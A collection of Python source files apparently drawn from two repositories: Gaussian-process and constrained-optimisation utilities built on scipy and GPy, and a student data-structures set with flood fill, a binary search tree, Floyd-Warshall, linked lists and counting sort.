res = optimize.fmin_l_bfgs_b(f_augmented,x0=x0,bounds=bounds,approx_grad=True, maxiter=maxiter)
d = res[2]
if d['task'] == b'ABNORMAL_TERMINATION_IN_LNSRCH':
result_x = np.atleast_1d(x0)[:-1]
else:
result_x = np.atleast_1d(res[0])[:-1]
result_fx = f(result_x)
const_val = const_func(result_x)
converged = True
if d['warnflag'] != 0:
converged = False
disp = True
if converged is False and disp is True:
if d['warnflag'] == 1:
print('Too many function evaluations or iterations')
elif d['warnflag'] == 2:
print('Stopped for another reason')
print('x: ', result_x, ', lambda: ', res[0][-1], ', fx: ', result_fx)
print('gradient: ', d['grad'], ', constraint: ', const_val )
return result_x, result_fx, {'converged':converged, 'const_val':const_val}
def optimize_trust_constr(x0, f, lb, ub, const_func, maxiter=200):
bounds = optimize.Bounds(lb, ub)
nonlin_const = optimize.NonlinearConstraint(const_func, 0.0, 0.0, jac=const_func.J, hess=const_func.H)
res = optimize.minimize(f, x0, method='trust-constr', constraints=[nonlin_const], bounds=bounds)
converged = res.status is 1 or res.status is 2
return res.x, res.fun, {'converged':converged, 'const_val':res.constr[0]}
def optimize_SLSQP(x0, f, lb, ub, const_func, maxiter=200):
bounds = optimize.Bounds(lb, ub)
eq_cons = {'type': 'eq',
'fun': const_func,
'jac': const_func.J}
res = optimize.minimize(f, x0, method='SLSQP', constraints=[eq_cons], bounds=bounds, options={'ftol': 1e-9})
converged = res.status is 0
const_val = const_func(res.x)
return res.x, res.fun, {'converged':converged, 'const_val':const_val}
def filter_results(result_filter, x_all, fx_all, stat_all):
if callable(result_filter):
filtered_all = [result_filter(stat) for stat in stat_all]
if any(filtered_all):
x_all = [x for (x,filtered) in zip(x_all, filtered_all) if filtered]
fx_all = [fx for (fx,filtered) in zip(fx_all, filtered_all) if filtered]
stat_all = [stat for (stat,filtered) in zip(stat_all, filtered_all) if filtered]
else:
print('WARNING: No result can satisfy the result filter')
return x_all, fx_all, stat_all
def optimize_multi_x0(opt_func, x0_all, f, lb, ub, const_func, maxiter=200, result_filter=None):
num_x0 = len(x0_all)
# run the optimizer with multiple restarts
x_found_all = list()
fx_found_all = list()
stat_all = list()
for idx_x0 in range(len(x0_all)):
x0 = x0_all[idx_x0]
result_x, result_fx, stat = opt_func(x0, f, lb, ub, const_func=const_func, maxiter=maxiter)
x_found_all.append(result_x)
fx_found_all.append(result_fx)
stat_all.append(stat)
x_found_all, fx_found_all, stat_all = filter_results(result_filter, x_found_all, fx_found_all, stat_all)
idx_min = np.argmin(fx_found_all) # index of max EI
x_min = x_found_all[idx_min]
fx_min = fx_found_all[idx_min]
return x_min, fx_min
def optimize_multi_x0_parallel(opt_func, x0_all, f, lb, ub, const_func, maxiter=200, result_filter=None, num_proc=4):
#f_x0 = lambda x0 : opt_func(x0, f, lb, ub, const_func=const_func, maxiter=maxiter)
f_x0 = partial(opt_func, f=f, lb=lb, ub=ub, const_func=const_func, maxiter=maxiter)
pool = Pool(processes=num_proc)
x0_all = [x0 for x0 in x0_all]
list_tuples = pool.map(f_x0, x0_all)
x_found_all, fx_found_all, stat_all = zip(*list_tuples) # list of tuples to multiple lists
x_found_all, fx_found_all, stat_all = filter_results(result_filter, x_found_all, fx_found_all, stat_all)
idx_min = np.argmin(fx_found_all) # index of max EI
x_min = x_found_all[idx_min]
fx_min = fx_found_all[idx_min]
return x_min, fx_min
def optimize_DIRECT(f, lb, ub, const_func, maxiter=200):
dim = lb.size
bounds = [(lb[i],ub[i]) for i in range(dim)]
f_augmented = lambda x : f(x) + 10.*const_func(x)
res = scipydirect.minimize(f_augmented, bounds=bounds)
print(res)
x = res['x']
print(const_func(x))
print(f(x))
return res['x'], res['fun']
class Constraint_SS(object):
'''
Sum of squared values
'''
def __call__(self, x):
return np.sum(np.square(x)) -1.0 # constraint to make length 1.0
def J(self, x):
#print(x)
return [2.0 * x]
def H(self, x, v):
#print(x,v)
return v * 2.0 * np.eye(x.size)
class Constraint_Sum(object):
'''
Sum of values
'''
def __call__(self, x):
return np.sum(x) - 1.0 # constraint to make length 1.0
def J(self, x):
return [x]
def H(self, x, v):
return np.zeros((x.size,x.size))
def uniform_to_hypersphere(samples):
samples = norm.ppf(samples) # change to normally distributed samples
samples = np.fabs(samples) # make to one-sided samples
samples = -samples/np.sqrt(np.sum(np.square(samples),axis=1,keepdims=True)) # length to 1, direction to negative side
return samples
def random_hypersphere(dim, num_samples):
samples = np.random.uniform(size=(num_samples,dim))
#return (-directions[np.newaxis,:])*uniform_to_hypersphere(samples)
return uniform_to_hypersphere(samples)
def lhs_hypersphere(dim, num_samples):
samples = sample_lhs_basic(dim, num_samples) # could be confusing with param. of np.random.uniform
return uniform_to_hypersphere(samples)
def random_hypercube(point_lb, point_ub, num_samples):
assert len(point_lb) == len(point_ub)
ndim = len(point_lb)
interval = point_ub - point_lb
offset = point_lb
samples = np.random.uniform(size=(num_samples,ndim))*interval[np.newaxis,:] + offset
#print(samples)
return samples
'''
def random_hypercube(point_lb, point_ub, num_samples):
assert len(point_lb) == len(point_ub)
ndim = len(point_lb)
# choose a face
face_idx = np.random.randint(ndim) # coordinate of this index is point_lb[face_idx]
face_lb = np.append(point_lb[:face_idx], point_lb[face_idx+1:])
face_ub = np.append(point_ub[:face_idx], point_ub[face_idx+1:])
interval = point_ub - point_lb
interval[face_idx] = 0.
offset = point_lb
samples = np.random.uniform(size=(num_samples,ndim))*interval[np.newaxis,:] + offset
#print(samples)
return samples
# convert samples to unit vectors
#u_samples = (samples-point_ub[np.newaxis,:])/np.sqrt(np.sum(np.square(samples),axis=1,keepdims=True)) # length to 1, direction to negative side
#return u_samples
'''
# for test lhd
def main():
lb = np.array([1.0, 2.0, 3.0])
ub = np.array([2.0, 3.0, 4.0])
lhd = sample_lhs_bounds(lb,ub,10)
print(lhd)
if __name__ == "__main__":
main()
```
#### File: Sampling/gp/GP_interface.py
```python
import numpy as np
class GPInterface(object):
def __init__(self):
self.kernel = None
self.ndim = None
self.model = None
self.outdim = 1
def create_kernel(self, ndim, kernel_name, var_f=1.0, lengthscale=1.0):
pass
def create_model(self, x, y, noise_var, noise_prior):
pass
def predict_f(self, x, full_cov=False):
pass
def optimize(self, num_restarts=30, opt_messages=False, print_result=False):
pass
def convert_lengthscale(ndim, lengthscale):
if np.isscalar(lengthscale):
l = lengthscale * np.ones(ndim)
else:
l = lengthscale
return l
def convert_2D_format(arr):
if not isinstance(arr, np.ndarray):
raise ValueError('The array is not a numpy array.')
if arr.ndim == 1:
return arr[:, np.newaxis] # asuumes arr is single dimensional data
if arr.ndim == 2:
return arr
else:
raise ValueError('The array cannot be more than 2 dimensional')
```
#### File: Sampling/gp/GP_models.py
```python
from .GPy_wrapper import GPyWrapper_Classifier as GPC
from . import GP_util
import numpy as np
import multiprocessing
from ...main_utils.dict_util import Tuning_dict
class GP_base():
def __init__(self,n,bound,origin,configs,GP_type=False):
self.GP_type = GP_type
self.n,self.bound,self.origin=n,np.array(bound),np.array(origin)
self.c = Tuning_dict(configs)
self.create_gp()
def create_gp(self):
l_p_mean, l_p_var = self.c.get('length_prior_mean','length_prior_var')
n = self.n
l_prior_mean = l_p_mean * np.ones(n)
l_prior_var = (l_p_var**2) * np.ones(n)
if self.GP_type == False:
r_min, var_p_m_div = self.c.get('r_min','var_prior_mean_divisor')
r_min, r_max = r_min, np.linalg.norm(self.bound-self.origin)
v_prior_mean = ((r_max-r_min)/var_p_m_div)**2
self.gp = GP_util.create_GP(self.n, *self.c.get('kernal'), v_prior_mean, l_prior_mean, (r_max-r_min)/2.0)
GP_util.set_GP_prior(self.gp, l_prior_mean, l_prior_var, None, None) # do not set prior for kernel var
GP_util.fix_hyperparams(self.gp, False, True)
else:
v_prior_mean, v_prior_var = self.c.get('var_prior_mean','var_prior_var')
v_prior_var = v_prior_var**2
self.gp = GP_util.create_GP(self.n, *self.c.get('kernal'), lengthscale=l_prior_mean, const_kernel=True, GP=GPC)
GP_util.set_GP_prior(self.gp, l_prior_mean, l_prior_var, v_prior_mean, v_prior_var)
def train(self,x,y,*args,**kwargs):
self.gp.create_model(x, y, *args, **kwargs)
def optimise(self,**kwargs):
if self.GP_type == False:
self.gp.optimize(*self.c.get('restarts'),parallel=True,**kwargs)
else:
self.gp.optimize()
#inside = get_between(self.origin,self.bounds,points_poff)
#u_all_gp, r_all_gp = util.ur_from_vols_origin(points_poff[inside], self.origin, returntype='array')
#self.gp.create_model(u_all_gp, r_all_gp[:,np.newaxis], (self.tester.d_r/2)**2, noise_prior='fixed')
def predict(self,x):
if self.GP_type == False:
return self.gp.predict_f(x)
else:
return self.gp.predict_prob(x)
class GPC_heiracical():
def __init__(self,n,bound,origin,configs):
self.built = [False]*len(configs)
self.gp = []
for config in configs:
self.gp += [GP_base(n,bound,origin,config,GP_type=True)]
def train(self,x,y_cond):
x = np.array(x)
for i,gp in enumerate(self.gp):
use_to_train = np.array([True]*x.shape[0])if i == 0 else y_cond[:,i-1]
count_pos = use_to_train[use_to_train].size
count_pos_of_pos = np.sum(y_cond[use_to_train,i])
print("There are %i training examples for model %i and %i are positive"%(count_pos,i,count_pos_of_pos))
if count_pos>0:
gp.train(x[use_to_train],y_cond[use_to_train,i])
self.built[i] = True
def optimise(self,parallel=False):
if parallel:
def f(i):
self.gp[i].optimise()
#pool = multiprocessing.Pool(multiprocessing.cpu_count())
with Pool(processes=multiprocessing.cpu_count()) as pool:
pool.map(f, range(len(self.gp)))
#results
else:
for i,gp in enumerate(self.gp):
if self.built[i]:
gp.optimise()
def predict(self,x):
results = []
for i,gp in enumerate(self.gp):
if self.built[i]:
results += [gp.predict(x)]
return results
def predict_comb_prob(self,x):
probs = self.predict(x)
total_prob = np.prod(probs, axis=0)
return total_prob
```
#### File: Sampling/gp/GPy_wrapper.py
```python
import numpy as np
import GPy
from .GP_interface import GPInterface, convert_lengthscale, convert_2D_format
class GPyWrapper(GPInterface):
def __init__(self):
# GPy settings
GPy.plotting.change_plotting_library("matplotlib") # use matpoltlib for drawing
super().__init__()
self.center = 0.0
def create_kernel(self, ndim, kernel_name, var_f=1.0, lengthscale=1.0, const_kernel=False):
if kernel_name == 'Matern52':
l = convert_lengthscale(ndim, lengthscale)
kernel = GPy.kern.Matern52(input_dim=ndim, ARD=True, variance=var_f, lengthscale=l, name='basic')
elif kernel_name == 'RBF':
l = convert_lengthscale(ndim, lengthscale)
kernel = GPy.kern.RBF(input_dim=ndim, ARD=True, variance=var_f, lengthscale=l, name='basic')
else:
raise ValueError('Unsupported kernel: '+ kernel_name)
self.ndim = ndim
self.kernel = kernel
if const_kernel:
self.kernel += GPy.kern.Bias(1.0)
self.stat_kernel = self.kernel.basic
else:
self.stat_kernel = self.kernel
def set_kernel_length_prior(self, prior_mean, prior_var):
if self.ndim != len(prior_mean) or self.ndim != len(prior_var):
raise ValueError('Incorrect kernel prior parameters.')
if self.kernel is None:
raise ValueError('Kernel should be defined first.')
for i in range(self.ndim):
self.stat_kernel.lengthscale[[i]].set_prior(GPy.priors.Gamma.from_EV(prior_mean[i],prior_var[i])) # don't know why, but [i] does not work
def set_kernel_var_prior(self, prior_mean, prior_var):
self.stat_kernel.variance.set_prior(GPy.priors.Gamma.from_EV(prior_mean,prior_var))
def fix_kernel_lengthscale(self):
self.stat_kernel.lengthscale.fix()
def fix_kernel_var(self):
self.stat_kernel.variance.fix()
def create_model(self, x, y, noise_var, noise_prior='fixed'):
x = convert_2D_format(x)
y = convert_2D_format(y) - self.center
self.outdim = y.shape[1]
noise_var = np.array(noise_var)
if noise_var.ndim == 0:
self.model = GPy.models.GPRegression(x, y, self.kernel, noise_var=noise_var)
noise = self.model.Gaussian_noise
else:
assert noise_var.shape == y.shape
self.model = GPy.models.GPHeteroscedasticRegression(x, y, self.kernel)
self.model['.*het_Gauss.variance'] = noise_var
noise = self.model.het_Gauss.variance
if noise_prior == 'fixed':
noise.fix()
else:
raise ValueError('Not Implemented yet.')
def predict_f(self, x, full_cov=False):
'''
Returns:
posterior mean, posterior variance
'''
x = convert_2D_format(x)
post_mean, post_var = self.model.predict_noiseless(x, full_cov=full_cov)
if self.outdim > 1:
post_var = np.concatenate([post_var]*self.outdim, axis=-1)
return post_mean + self.center, post_var
def predict_withGradients(self, x):
'''
Borrowed from https://github.com/SheffieldML/GPyOpt/blob/master/GPyOpt/models/gpmodel.py
Returns the mean, standard deviation, mean gradient and standard deviation gradient at X.
'''
x = convert_2D_format(x)
m, v = self.model.predict(x)
v = np.clip(v, 1e-10, np.inf)
dmdx, dvdx = self.model.predictive_gradients(x)
dmdx = dmdx[:,:,0]
dsdx = dvdx / (2*np.sqrt(v))
return m + self.center, np.sqrt(v), dmdx, dsdx
def posterior_sample_f(self, x, size = 10):
'''
Parameters
x: (Nnew x input_dim)
Returns
(Nnew x output_dim x samples)
'''
return self.model.posterior_samples_f(x, size) + self.center
def optimize(self, num_restarts=30, opt_messages=False, print_result=True, parallel=False):
self.model.optimize_restarts(num_restarts=num_restarts, robust=True, parallel=False, messages=opt_messages)
if print_result:
print(self.kernel)
print(self.stat_kernel.lengthscale)
print(self.stat_kernel.variance)
class GPyWrapper_Classifier(GPyWrapper):
def create_model(self, x, y):
assert self.center == 0.0
x = convert_2D_format(x)
y = convert_2D_format(y)
self.outdim = y.shape[1]
self.model = GPy.models.GPClassification(x, y, self.kernel)
def predict_prob(self, x):
x = convert_2D_format(x)
prob = self.model.predict(x, full_cov=False)[0]
return prob
def optimize(self, maxiter=1000, opt_messages=False, print_result=True):
for i in range(5):
self.model.optimize(max_iters=int(maxiter/5), messages=opt_messages)
if print_result:
print(self.kernel)
print(self.stat_kernel.lengthscale)
class GPyWrapper_MultiSeparate(object):
def create_kernel(self, ndim, outdim, kernel_name, var_f=1.0, lengthscale=1.0, const_kernel=False):
if isinstance(kernel_name, str):
kernel_name = [kernel_name]*outdim
if np.isscalar(var_f):
var_f = np.ones(outdim) * var_f
if np.isscalar(lengthscale):
var_f = np.ones(outdim) * lengthscale
if isinstance(const_kernel, bool):
const_kernel = [const_kernel]*outdim
self.gp_list = list()
for i in range(outdim):
gp = GPyWrapper()
gp.create_kernel(ndim, kernel_name[i], var_f[i], lengthscale[i], const_kernel[i])
self.gp_list.append(gp)
self.outdim = outdim
def set_kernel_length_prior(self, prior_mean, prior_var):
# Apply same prior for all outputs
for i in range(self.outdim):
self.gp_list[i].set_kernel_length_prior(prior_mean, prior_var)
def set_kernel_var_prior(self, prior_mean, prior_var):
# Apply same prior for all outputs
for i in range(self.outdim):
self.gp_list[i].set_kernel_var_prior(prior_mean, prior_var)
def fix_kernel_lengthscale(self):
for i in range(self.outdim):
self.gp_list[i].fix_kernel_lengthscale()
def fix_kernel_var(self):
for i in range(self.outdim):
self.gp_list[i].fix_kernel_var()
def create_model(self, x, y, noise_var, noise_prior='fixed'):
if not (y.ndim == 2 and y.shape[1] == self.outdim):
raise ValueError('Incorrect data shape.')
noise_var = np.array(noise_var)
for i in range(self.outdim):
if noise_var.ndim == 2 and noise_var.shape[1] == self.outdim:
noise_var_i = noise_var[:, i:i+1]
else:
noise_var_i = noise_var
gp = self.gp_list[i]
gp.create_model(x, y[:,i:i+1], noise_var_i, noise_prior)
def predict_f(self, x, full_cov=False):
post_mean_all = list()
post_var_all = list()
for i in range(self.outdim):
post_mean, post_var = self.gp_list[i].predict_f(x, full_cov)
post_mean_all.append(post_mean)
post_var_all.append(post_var)
return np.concatenate(post_mean_all,axis=-1), np.concatenate(post_var_all,axis=-1)
def posterior_sample_f(self, x, size = 10):
post_samples_all = list()
for i in range(self.outdim):
post_samples = self.gp_list[i].predict_f(x, full_cov)
post_samples_all.append(post_samples)
return np.concatenate(post_samples_all,axis=1)
def optimize(self, num_restarts=30, opt_messages=False, print_result=False):
for i in range(self.outdim):
self.gp_list[i].optimize(num_restarts, opt_messages, print_result)
def predict_withGradients(self, x):
'''
Borrowed from https://github.com/SheffieldML/GPyOpt/blob/master/GPyOpt/models/gpmodel.py
Returns the mean, standard deviation, mean gradient and standard deviation gradient at X.
m_all: (num_x, outdim)
std_all: (num_x, outdim)
dmdx_all: (num_x, outdim, n_dim)
dsdx_all: (num_x, outdim, n_dim)
'''
m_all, std_all, dmdx_all, dsdx_all = [], [], [], []
for i in range(self.outdim):
m, std, dmdx, dsdx = self.gp_list[i].predict_withGradients(x)
m_all.append(m)
std_all.append(std)
dmdx_all.append(dmdx)
dsdx_all.append(dsdx)
return np.concatenate(m_all,axis=-1), np.concatenate(std_all,axis=-1), np.stack(dmdx_all,axis=1), np.stack(dsdx_all,axis=1)
class GPyWrapper_MultiIndep(GPyWrapper):
def create_kernel(self, ndim, outdim, kernel_name, var_f=1.0, lengthscale=1.0, const_kernel=False):
super().create_kernel(ndim, kernel_name, var_f, lengthscale, const_kernel)
k_multi = GPy.kern.IndependentOutputs([self.kernel, self.kernel.copy()])
#icm = GPy.util.multioutput.ICM(input_dim=ndim, num_outputs=outdim, kernel=self.kernel)
#icm.B.W.constrain_fixed(0) # fix W matrix to 0
if const_kernel:
self.stat_kernel = k_multi.sum.basic
else:
self.stat_kernel = k_multi.basic
self.kernel = k_multi
print(self.kernel)
def create_model(self, x, y, noise_var, noise_prior='fixed'):
x = convert_2D_format(x)
y = convert_2D_format(y) - self.center
numdata = x.shape[0]
outdim = y.shape[1]
indim = x.shape[1]
yy = y.transpose().ravel()
ind = np.concatenate([ o*np.ones(numdata) for o in range(outdim)])
xx = np.concatenate([x]*outdim)
xx = np.concatenate((xx,ind[:,np.newaxis]), axis=1)
print(xx.shape, yy.shape)
self.model = GPy.models.GPRegression(x, y, self.kernel, noise_var=noise_var)
if noise_prior == 'fixed':
self.model.Gaussian_noise.fix()
else:
raise ValueError('Not Implemented yet.')
def create_GP(num_active_gates, outdim, k_name='Matern52', var_f=1.0, lengthscale=1.0, center=0.0):
if np.isscalar(lengthscale):
lengthscale = np.ones(num_active_gates)
gp = GPyWrapper() # initialize GP environment
#gp = GPyWrapper_MultiIndep() # initialize GP environment
gp.center = center
# GP kernels
gp.create_kernel(num_active_gates, k_name, var_f, lengthscale)
#gp.create_kernel(num_active_gates, outdim, k_name, var_f, lengthscale)
return gp
def main():
X = np.arange(1,6).reshape((5,1))
f = lambda x : np.square(x-4.0)
#Y = np.concatenate([f(X), -f(X)], axis=1)
Y = np.concatenate([f(X)], axis=1)
#noise_var = 0.01**2
#noise_var = np.concatenate([np.square(X / 10.)]*2, axis=1)
noise_var = np.square(X / 10.)
print(X.shape, Y.shape)
gp = create_GP(1, 2, 'Matern52', 2.0, 1.0, 0.0)
gp.create_model(X, Y, noise_var, noise_prior='fixed')
gp.optimize()
X_pred = np.linspace(1.,5.,10).reshape((-1,1))
mean, cov = gp.predict_f(X_pred)
print(mean)
#print(cov)
'''
###
# GP Classification test
###
X = np.arange(1,6).reshape((5,1))
Y = np.array([1.0, 1.0, 1.0, 0.0, 0.0]).reshape((5,1))
gpc = GPyWrapper_Classifier()
gpc.create_kernel(1, 'RBF', 1.0, 1.0)
gpc.create_model(X, Y)
X_pred = np.linspace(1.,5.,10).reshape((-1,1))
print(gpc.predict_prob(X_pred))
print(gpc.model)
gpc.optimize()
print(gpc.predict_prob(X_pred))
print(gpc.model)
'''
if __name__ == '__main__':
main()
``` |
{
"source": "josephhlwang/DataStructsAlgo",
"score": 3
} |
#### File: DataStructsAlgo/Algos/flood_fill.py
```python
def flood_fill_dfs(mat, x, y, rep):
# flood fill algo fills the target val at x,y and all nearby target val to replacement val
# it can use dfs or bfs traversal
# possible movements
ROW = (0, 0, 1, -1)
COL = (1, -1, 0, 0)
# get target val
targ = mat[x][y]
# invalid cases
if not mat or not len(mat) or targ == rep:
return
stack = [(x, y)]
# run dfs traversal to replace vals
while stack:
# get cur pos
i, j = stack.pop()
mat[i][j] = rep
# add possible movements from cur pos
for k in range(4):
next_x = i + ROW[k]
next_y = j + COL[k]
# only add if movement valid and is target val
if is_valid(mat, next_x, next_y) and mat[next_x][next_y] == targ:
stack.append((next_x, next_y))
def flood_fill_bfs(mat, x, y, rep):
# possible movements
ROW = (0, 0, 1, -1)
COL = (1, -1, 0, 0)
# get target val
targ = mat[x][y]
# invalid cases
if not mat or not len(mat) or not is_valid(mat, x, y) or targ == rep:
return
queue = [(x, y)]
# run bfs traversal to replace vals
while queue:
# get cur pos
i, j = queue.pop(0)
mat[i][j] = rep
# add possible movements from cur pos
for k in range(4):
next_x = i + ROW[k]
next_y = j + COL[k]
# only add if movement valid and is target val
if is_valid(mat, next_x, next_y) and mat[next_x][next_y] == targ:
queue.append((next_x, next_y))
# check if pos valid
def is_valid(mat, x, y):
return 0 <= x < len(mat) and 0 <= y < len(mat[0])
# mat = [
# ["Y", "Y", "Y", "G", "G", "G", "G", "G", "G", "G"],
# ["Y", "Y", "Y", "Y", "Y", "Y", "G", "X", "X", "X"],
# ["G", "G", "G", "G", "G", "G", "G", "X", "X", "X"],
# ["W", "W", "W", "W", "W", "G", "G", "G", "G", "X"],
# ["W", "R", "R", "R", "R", "R", "G", "X", "X", "X"],
# ["W", "W", "W", "R", "R", "G", "G", "X", "X", "X"],
# ["W", "B", "W", "R", "R", "R", "R", "R", "R", "X"],
# ["W", "B", "B", "B", "B", "R", "R", "X", "X", "X"],
# ["W", "B", "B", "X", "B", "B", "B", "B", "X", "X"],
# ["W", "B", "B", "X", "X", "X", "X", "X", "X", "X"],
# ]
# mat2 = [
# ["Y", "Y", "Y", "G", "G", "G", "G", "G", "G", "G"],
# ["Y", "Y", "Y", "Y", "Y", "Y", "G", "X", "X", "X"],
# ["G", "G", "G", "G", "G", "G", "G", "X", "X", "X"],
# ["W", "W", "W", "W", "W", "G", "G", "G", "G", "X"],
# ["W", "R", "R", "R", "R", "R", "G", "X", "X", "X"],
# ["W", "W", "W", "R", "R", "G", "G", "X", "X", "X"],
# ["W", "B", "W", "R", "R", "R", "R", "R", "R", "X"],
# ["W", "B", "B", "B", "B", "R", "R", "X", "X", "X"],
# ["W", "B", "B", "X", "B", "B", "B", "B", "X", "X"],
# ["W", "B", "B", "X", "X", "X", "X", "X", "X", "X"],
# ]
# x = 3
# y = 9
# replacement = "C"
# flood_fill_dfs(mat, x, y, replacement)
# flood_fill_bfs(mat2, x, y, replacement)
# for arr in mat:
# print(arr)
```
#### File: DataStructsAlgo/BST/bst.py
```python
from node import Node
class BST:
# BST contains a Node object as head
# Nodes val >= Nodes left childs val; Nodes val < Nodes right childs val; Property recursively true
def __init__(self, head=None):
self.head = head
self.size = 1 if head else 0
def insert(self, val):
new_node = Node(val)
if self.is_empty():
# replace head
self.head = new_node
else:
# navigate to correct position
cur = self.head
while True:
# go left
if val <= cur.val:
if cur.left == None:
cur.left = new_node
break
cur = cur.left
# go right
else:
if cur.right == None:
cur.right = new_node
break
cur = cur.right
self.size += 1
def level_order(self):
if not self.is_empty():
# level order in trees same as BFS is graphs
# no need to keep visited since trees have no cycles
queue = [self.head]
tree = ""
# cur_level is number of nodes on current level, next_level same
cur_level, next_level = 1, 0
while queue:
cur = queue.pop(0)
tree += str(cur.val) + " "
cur_level -= 1
if cur.left:
queue.append(cur.left)
next_level += 1
if cur.right:
queue.append(cur.right)
next_level += 1
# current level of nodes done, go to next
if cur_level == 0:
cur_level, next_level = next_level, 0
tree += "\n"
return tree
return ""
def remove(self, val):
cur = self.head
# if node is head
if cur and cur.val == val:
# find replacement
rep = self._find_replacement(cur)
# replace children
if rep:
rep.left = cur.left
rep.right = cur.right
self.head = rep
self.size -= 1
# node is below head
elif cur:
# keep track of parent, navigate to val
par = cur
# cur one level down from par
if val < cur.val:
cur = cur.left
else:
cur = cur.right
while cur:
if val == cur.val:
# find replacement
rep = self._find_replacement(cur)
# replacement from right child
# check if cur is leaf
if rep:
rep.left = cur.left
rep.right = cur.right
# check which side cur is, replace cur with rep
if par.left and par.left.val == val:
par.left = rep
elif par.right and par.right.val == val:
par.right = rep
self.size -= 1
break
# navigate to side with cur
else:
if val < cur.val:
cur = cur.left
else:
cur = cur.right
if val < par.val:
par = par.left
else:
par = par.right
def _find_replacement(self, node):
# return None if node is leaf
rep = None
# right node exists, find replacement here
if node.right:
# keep track of par
par = node.right
# go to leftest node of par
cur = par.left
if cur == None:
# par is leftest node, return it
# unlink par from node
node.right = par.right
rep = par
else:
# navigate to leftest node
while cur.left:
cur = cur.left
par = par.left
# replace par left child with cur right child
par.left = cur.right
rep = cur
rep.right = None
print("here", node.right.val)
# find replacement left
elif node.left:
# keep track of par
par = node.left
# go to rightest node of par
cur = par.right
if cur == None:
# par is rightest node, return it
# unlink par from node
node.left = par.left
rep = par
else:
# navigate to rightest node
while cur.right:
cur = cur.right
par = par.right
# replace par right child with cur left child
par.right = cur.left
rep = cur
rep.left = None
return rep
def find(self, val):
cur = self.head
while cur:
if cur.val == val:
return True
elif val < cur.val:
cur = cur.left
else:
cur = cur.right
return False
def is_empty(self):
return self.size == 0
# n = Node(4)
# t = BST(n)
# t.insert(2)
# t.insert(6)
# t.insert(1)
# t.insert(3)
# t.insert(5)
# t.insert(7)
# print("size", t.size)
# print(t.level_order())
# t.remove(4)
# print(t.level_order())
# print("size", t.size)
# print(t.find(5))
n = Node(-4)
t = BST(n)
t.insert(-1)
t.insert(0)
t.insert(2)
t.remove(-1)
print(t.level_order())
```
#### File: DataStructsAlgo/Graph/floyd_warshall_minpaths.py
```python
from Graph.graph import Graph
# floyd warshall algo uses dynamic programming to find shortest paths from all nodes to all nodes
# if mid dist matrix diag contains negative, then graph contains negative cycles
def floyd_warshall(graph):
# init shortest distance adjacency matrix
adj = graph.get_adj_matrix()
n = graph.size
min_dist = [[float("inf")] * n for i in range(n)]
# set self distance to 0
for i in range(n):
min_dist[i][i] = 0
# copy edges from graph adjacency matrix
for i in range(n):
for j in range(n):
if adj[i][j] != -1:
min_dist[i][j] = adj[i][j]
# k is a pivot vertex
# i and j are vertices we are trying to find the shortest path for
# for each pivot
for k in range(n):
for i in range(n):
for j in range(n):
d = min_dist[i][k] + min_dist[k][j]
# if using that pivot is shorter than the edge
if d < min_dist[i][j]:
# update the shortest dist for i,j
min_dist[i][j] = d
# print results
for i in range(n):
for j in range(n):
if i != j:
d = min_dist[i][j]
if d != float("inf"):
print(f"Min path from {i} to {j} is {d}")
g = Graph()
g.add_vertex(0)
g.add_vertex(1)
g.add_vertex(2)
g.add_vertex(3)
g.add_vertex(4)
g.add_vertex(5)
g.add_vertex(6)
g.add_edge(0, 1, 7)
g.add_edge(0, 3, 5)
g.add_edge(1, 2, 8)
g.add_edge(1, 3, 9)
g.add_edge(1, 4, 7)
g.add_edge(2, 4, 5)
g.add_edge(3, 4, 5)
g.add_edge(3, 5, 6)
g.add_edge(4, 5, 8)
g.add_edge(4, 6, 9)
# print(g)
# print(g.get_edges())
# print(g.get_adj_matrix())
floyd_warshall(g)
```
#### File: DataStructsAlgo/LinkedList/floyds_cycle.py
```python
from node import Node
def floyds(head):
fast = slow = head
while fast and fast.next:
fast = fast.next.next
slow = slow.next
if fast == slow:
return True
return False
# n = Node(0)
# n1 = Node(1)
# n2 = Node(2)
# n3 = Node(3)
# n4 = Node(4)
# n.next = n1
# n1.next = n2
# n2.next = n3
# n3.next = n4
# print(floyds(n))
```
#### File: DataStructsAlgo/LinkedList/linked_list.py
```python
from node import Node
class LinkedList:
def __init__(self, head=None):
self.length = 1 if head else 0
self.head = head
def is_empty(self):
return self.length == 0
def insert(self, val, index=None):
if index == None:
index = self.length
# cannot insert outside of current length
if index > self.length:
print("Invalid index.")
else:
new_node = Node(val)
if index == 0:
# no head
if self.is_empty():
self.head = new_node
# replace head, join old head with new head
else:
temp = self.head
self.head = new_node
self.head.next = temp
# replace kth index, navigate to its parent, the k-1th index
else:
cur = self.head
count = 0
while count < index - 1:
count += 1
cur = cur.next
temp = cur.next
cur.next = new_node
new_node.next = temp
self.length += 1
def __str__(self):
li = ""
cur = self.head
while cur:
li += str(cur.val) + " > "
cur = cur.next
return li[:-3]
def find(self, val):
if not self.is_empty():
cur = self.head
index = 0
# linear search
while cur:
if val == cur.val:
return index
cur = cur.next
index += 1
return -1
def remove(self, index):
if index >= self.length:
print("Invalid index.")
else:
# if head, replace with next node
if index == 0:
self.head = self.head.next
# navigate to the k-1 element, remove kth element
else:
cur = self.head
count = 0
while count < index - 1:
index -= 1
cur = cur.next
# remove by replacing kth element with k+1th element
temp = cur.next.next
cur.next = temp
self.length -= 1
# head = Node(6)
# ll = LinkedList()
# print(ll.is_empty())
# ll.insert(7, 0)
# ll.insert(8, 1)
# ll.insert(9, 2)
# ll.insert(8.5, 2)
# print(ll.length)
# print(ll)
# print(ll.find(8.5))
# ll.remove(1)
# print(ll.length)
# print(ll)
```
#### File: DataStructsAlgo/Sort/counting_sort.py
```python
def counting_sort(list, max):
# create arr of max+1 indices, fill arr with how many times each index comes up in list-to-be-sorted
# replace and sort list-to-be-sorted by iteration through arr
index = [0] * (max + 1)
for num in list:
index[num] += 1
count = 0
for i, num in enumerate(index):
for j in range(num):
list[count] = i
count += 1
list = [5, 2, 4, 1, 3]
counting_sort(list, 6)
print(list)
``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.